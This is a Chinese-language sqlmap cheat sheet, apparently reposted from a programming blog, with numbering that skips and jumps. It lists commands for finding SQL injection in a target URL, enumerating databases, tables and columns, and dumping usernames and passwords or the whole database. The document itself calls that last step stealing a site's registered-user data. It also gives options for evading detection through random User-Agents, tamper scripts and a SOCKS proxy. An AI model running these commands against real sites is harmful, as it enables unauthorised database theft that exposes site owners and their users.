sqlmap.py -u "url"#检测目标网站是否存在注入sqlmap.py -u "url" --dbs#获取对方数据库所有库的名称sqlmap.py -u "url" -D "security" --tables#获取security库下的表sqlmap.py -u "url" -D "security" -T "email,users" --column#获取email表,users表中的字段sqlmap.py -u "url" -D "security" -T "users" -C "id,username,password" --dump#导出数据指定的数据sqlmap.py -u "url" --dump-all#拖库,即把网站注册用户的资料数据库盗走的行为
sqlmap.py -u "url" --current-user#获取当前用户名称sqlmap.py -u "url" --current-db#获取当前使用的数据的名称sqlmap.py -u "url" -r 1.txt#指定文件检测注入sqlmap.py -u "url" --dbms "mysql"#指定数据库类型进行检测sqlmap.py -u "url" -r 1.txt -p "参数名"#post型注入,-p指定哪个参数注入sqlmap.py -u "url" --forms#自动搜索表单并测试注入
sqlmap.py -u "url" --dbs -v 4#显示sqlmap注入的信息
有七个等级,默认为1:
0.只显示python错误以及严重的信息
1.同时显示基本信息和警告信息
2.同时显示debug信息
3.同时显示注入的payload
4.同时显示http请求
5.同时显示http响应头
6.同时显示http响应页面
14.sqlmap.py -u "url" --tamper unmagicquotes#检测宽字节注入
15.sqlmap.py -u "url" --is-dba#判断当前用户是否为数据库管理员权限
16.sqlmap.py -u "url" --random-agent#随机User-Agent头
19.sqlmap.py -u "url" --users#列数据库用户
20.sqlmap.py -u "url" --batch#采用默认配置对提示进行设置
21.sqlmap.py -u "url" --roles 或者 --privileges#列用户以及权限
22.伪静态注入(使用sqlmap进行):
sqlmap.py -u "www.xxx.com/index.php/news/id/203*.html"
sqlmap.py -u "www.xxx.com/index.php/news/id/10*"
23.使用代理进行注入
--proxy=socks5://127.0.0.1:1080
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/216169.html原文链接:https://javaforall.net
